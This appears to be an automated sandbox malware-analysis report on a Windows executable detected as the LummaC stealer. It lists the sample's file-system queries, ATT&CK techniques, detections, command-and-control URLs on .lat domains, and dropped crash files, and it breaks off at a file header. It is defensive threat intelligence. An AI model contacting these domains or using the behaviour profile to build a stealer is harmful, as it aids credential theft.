            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\k6A01XaeEn.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 00000000.00000003.1940934471.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1940699958.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: k6A01XaeEn.exe PID: 7736, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: k6A01XaeEn.exe PID: 7736, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		11
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		1
            Query Registry            		Remote Services31
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory121
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager11
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
            Software Packing            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials22
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            k6A01XaeEn.exe74%ReversingLabsWin32.Trojan.StealC
            k6A01XaeEn.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://discokeyus.lat/xl100%Avira URL Cloudmalware
            https://discokeyus.lat/apiH100%Avira URL Cloudmalware
            https://discokeyus.lat/api06&cwn100%Avira URL Cloudmalware
            https://discokeyus.lat/dl100%Avira URL Cloudmalware
            https://discokeyus.lat/api100%Avira URL Cloudmalware
            https://discokeyus.lat/3100%Avira URL Cloudmalware
            https://discokeyus.lat/apiji100%Avira URL Cloudmalware
            https://discokeyus.lat/apiMcubs100%Avira URL Cloudmalware
            https://discokeyus.lat/100%Avira URL Cloudmalware
            https://discokeyus.lat/;o100%Avira URL Cloudmalware
            https://discokeyus.lat:443/api100%Avira URL Cloudmalware
            https://discokeyus.lat/apiU100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            discokeyus.lat
            		104.21.21.99
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              necklacebudi.latfalse
                		high
                https://discokeyus.lat/apitrue
                • Avira URL Cloud: malware
                		unknown
                aspecteirs.latfalse
                  		high
                  sustainskelet.latfalse
                    		high
                    crosshuaht.latfalse
                      		high
                      rapeflowwj.latfalse
                        		high
                        energyaffai.latfalse
                          		high
                          grannyejh.latfalse
                            		high
                            discokeyus.latfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabk6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://discokeyus.lat/;ok6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://discokeyus.lat/apiHk6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003269000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850465870.0000000003269000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://discokeyus.lat/apiMcubsk6A01XaeEn.exe, 00000000.00000003.1850513457.000000000321F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYik6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://x1.c.lencr.org/0k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://x1.i.lencr.org/0k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://discokeyus.lat/xlk6A01XaeEn.exe, 00000000.00000003.2018238766.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2005608699.0000000000B52000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installk6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchk6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://support.mozilla.org/products/firefoxgro.allk6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://discokeyus.lat/api06&cwnk6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94k6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://discokeyus.lat/dlk6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgk6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icok6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctak6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://upx.sf.netAmcache.hve.6.drfalse
                                                                  		high
                                                                  http://ocsp.rootca1.amazontrust.com0:k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016k6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003269000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1850465870.0000000003269000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brk6A01XaeEn.exe, 00000000.00000003.1882463665.0000000003335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://discokeyus.lat/apijik6A01XaeEn.exe, 00000000.00000003.1850513457.000000000321F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            http://crl.microk6A01XaeEn.exe, 00000000.00000003.2018293078.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2088649223.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2088366995.0000000000B2C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgk6A01XaeEn.exe, 00000000.00000003.1935140883.0000000003218000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936081491.000000000321A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003218000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://discokeyus.lat/3k6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://support.microsofk6A01XaeEn.exe, 00000000.00000003.1818839790.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://discokeyus.lat/k6A01XaeEn.exe, 00000000.00000002.2341497324.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?k6A01XaeEn.exe, 00000000.00000003.1880026898.0000000003264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://discokeyus.lat/apiUk6A01XaeEn.exe, 00000000.00000003.2088703483.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://discokeyus.lat:443/apik6A01XaeEn.exe, 00000000.00000003.1934783435.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1936118211.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1940512058.0000000003233000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.2018318661.0000000003245000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesk6A01XaeEn.exe, 00000000.00000003.1818932883.0000000003244000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=k6A01XaeEn.exe, 00000000.00000003.1818364043.000000000325A000.00000004.00000800.00020000.00000000.sdmp, k6A01XaeEn.exe, 00000000.00000003.1818256103.000000000325D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        104.21.21.99
                                                                                        		discokeyus.latUnited States
                                                                                        		13335CLOUDFLARENETUStrue

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1577869
                                                                                        Start date and time:2024-12-18 20:53:12 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 31s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:k6A01XaeEn.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:fd5fe344fef63284ed51951698535fca.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        • Number of executed functions: 0
                                                                                        • Number of non-executed functions: 0
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.65.92, 172.202.163.200, 20.190.147.11, 13.107.246.63
                                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target k6A01XaeEn.exe, PID 7736 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: k6A01XaeEn.exe

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        14:54:16API Interceptor8x Sleep call for process: k6A01XaeEn.exe modified
                                                                                        14:55:10API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        104.21.21.99Inv59895_abubakar.iddrisu.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                          V-Mail_maryland.gov.htmlGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                            https://webuildpart.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              discokeyus.latiOnDpwrkWY.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.197.170
                                                                                              hzD92yQcTT.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.197.170

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUShttps://52kz793.afratradingagency.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.18.95.41
                                                                                              https://img10.reactor.cc/pics/post/full/Sakimichan-artist-Iono-(Pokemon)-Pok%c3%a9mon-7823638.jpegGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 104.26.6.189
                                                                                              solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.75.163
                                                                                              http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                                              • 172.66.0.227
                                                                                              g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              • 162.159.61.3
                                                                                              solara-executor.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.75.163
                                                                                              https://usemployee-hrdbenefits.comGet hashmaliciousUnknownBrowse
                                                                                              • 104.16.123.96
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                              • 172.67.131.246
                                                                                              https://em.navan.com/MDM3LUlLWi04NzEAAAGXecU3IyvXka_yOfm1UXs3oOmq7mq-S6uBgGscrsY0kWMgpLalbadmEIYbTEXYqyKQHEXyRQM=Get hashmaliciousUnknownBrowse
                                                                                              • 104.16.79.73

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                              • 104.21.21.99
                                                                                              'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.21.99
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.21.99
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, StealcBrowse
                                                                                              • 104.21.21.99
                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 104.21.21.99
                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                              • 104.21.21.99
                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                              • 104.21.21.99
                                                                                              0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                              • 104.21.21.99
                                                                                              Lw1k8a7gQu.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.21.99

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_k6A01XaeEn.exe_1a38eed210313069526e11c1b112e2bcb68f5c_a1f3c556_4d7b85ca-6846-40b1-b65b-adb0d5d5bdf6\Report.wer

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.0259059851514825
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:2yz457shQsXhrV72fLQXIDcQMc67cE2cw3o+HbHg/8BRTf3Oy1E45WAU6NCUtW2L:9zhhQS0C/cFju3mezuiFRZ24IO8H
                                                                                              MD5:80C0C0E66EA3516DD1F188475CC22799
                                                                                              SHA1:BAB79CE05D042165B597E24C521650BDFC804ACB
                                                                                              SHA-256:09F227EA430D9A896152D5E521D1475B798D286ABCC145C60F74963B9500990C
                                                                                              SHA-512:C75D37694C64A6CF9B523D8D39E22796A6715238E41060CB03740CBC53915F5B894FC56EB4F09B3800023B960D45334A30AF8B8D512ECA4FEC7D40A6CE0A5FFB
                                                                                              Malicious:true
                                                                                              Reputation:low
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.2.5.2.8.6.2.1.8.5.8.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.2.5.2.8.6.6.4.0.4.5.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.7.b.8.5.c.a.-.6.8.4.6.-.4.0.b.1.-.b.6.5.b.-.a.d.b.0.d.5.d.5.b.d.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.0.c.5.d.d.c.-.b.f.8.a.-.4.9.2.1.-.8.e.5.f.-.5.6.b.3.5.9.0.d.b.4.d.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.k.6.A.0.1.X.a.e.E.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.3.8.-.0.0.0.1.-.0.0.1.4.-.5.2.7.8.-.6.c.9.b.8.6.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.5.8.0.9.e.2.a.d.6.8.e.5.d.d.f.4.9.a.8.4.3.8.5.b.1.d.f.d.8.7.9.0.0.0.0.f.f.f.f.!.0.0.0.0.e.d.d.4.a.2.c.d.a.6.8.2.4.5.6.0.6.4.6.5.c.9.2.0.a.d.8.2.4.d.8.e.e.d.5.d.0.c.5.6.!.k.6.A.0.1.X.a.e.E.n...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA3B.tmp.dmp

                                                                                              Download File
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 19:54:46 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):48458
                                                                                              Entropy (8bit):2.577745698358565
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:DlRKqvo7/QCTBqFL2d8f0r8wCbyvA2ukh:xDSRTB6IFC23ukh
                                                                                              MD5:E5FB3628BC566F6E3586AA2A3374B1E4
                                                                                              SHA1:3AA51D014A99ED48DC5D6E219CF695888693100D
                                                                                              SHA-256:B328E96DC3CEAEEC15834E6533E1566D939DEB5913357EB257327FF9CAA67B15
                                                                                              SHA-512:A2C8BC3AD6367DFDBF5E525993C6E36CA0623C3734B72ED10204CD0CF272EF2D851AF96356BA4E0517DD95FB4E5036286A4CD22DB0871C5CC513397DE71DB398
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:MDMP..a..... ........(cg............4...............H.......,....!...........3..........`.......8...........T...........hC...y..........4".......... $..............................................................................eJ.......$......GenuineIntel............T.......8...c(cg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB17.tmp.WERInternalMetadata.xml

